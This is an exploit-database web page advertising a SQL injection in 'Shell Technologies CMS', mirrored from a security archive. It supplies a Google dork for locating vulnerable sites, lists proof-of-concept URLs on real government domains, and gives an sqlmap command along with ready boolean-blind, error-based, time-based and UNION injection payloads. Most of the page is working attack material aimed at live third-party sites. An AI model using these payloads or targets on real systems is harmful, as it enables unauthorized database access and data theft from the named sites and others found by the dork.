Advertisement






Shell Technologies CMS - SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-07-14
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.052 0.699944

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070075

Below is a copy:

Shell Technologies CMS - SQL Injection
=========================================================
# Exploit Title: Shell Technologies CMS - SQL Injection
# Google Dork: intext:"Developed by Shell Technologies" inurl:".php?id="
# Date: 2021-07-08
# Exploit Author: Mr.B3nY
# Vendor Homepage: www.shelltechnologiesbd.com
# Tested on: Parrot OS
# Vulnerability : SQL Injection Vulnerability
=========================================================
[+] POC    :-  http://www.14upazilaudd.gov.bd/video-gallery.php?uap=3'
[+] POC    :-  http://www.14upazilaudd.gov.bd/image_gallery.php?id=4'
[+] POC    :-  http://www.mudp.gov.bd/video-gallery.php?uap=1'
[+] POC    :-  http://www.mudp.gov.bd/photo-gallery.php?id=1'
=========================================================

SQLMap
++++++++++++++++++++++++++
sqlmap -u "<url>/video-gallery.php?uap=3" --dbs
++++++++++++++++++++++++++
Parameter: uap (GET)
Type: boolean-based blind
Payload: uap=(SELECT (CASE WHEN (2253=2253) THEN 3 ELSE (SELECT 2255 UNION SELECT 1454) END))

Type: error-based
Payload: uap=3 AND (SELECT 6256 FROM(SELECT COUNT(*),CONCAT(0x717a6a6b71,(SELECT (ELT(6256=6256,1))),0x7178766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Payload: uap=3 OR (SELECT 6023 FROM (SELECT(SLEEP(5)))SDyl)

Type: UNION query
Payload: uap=-2305 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6b71,0x5748654d506b485948766f4a43484969426b546971524351515a416952544f5844645a684a464b6b,0x7178766b71),NULL-- -
=========================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.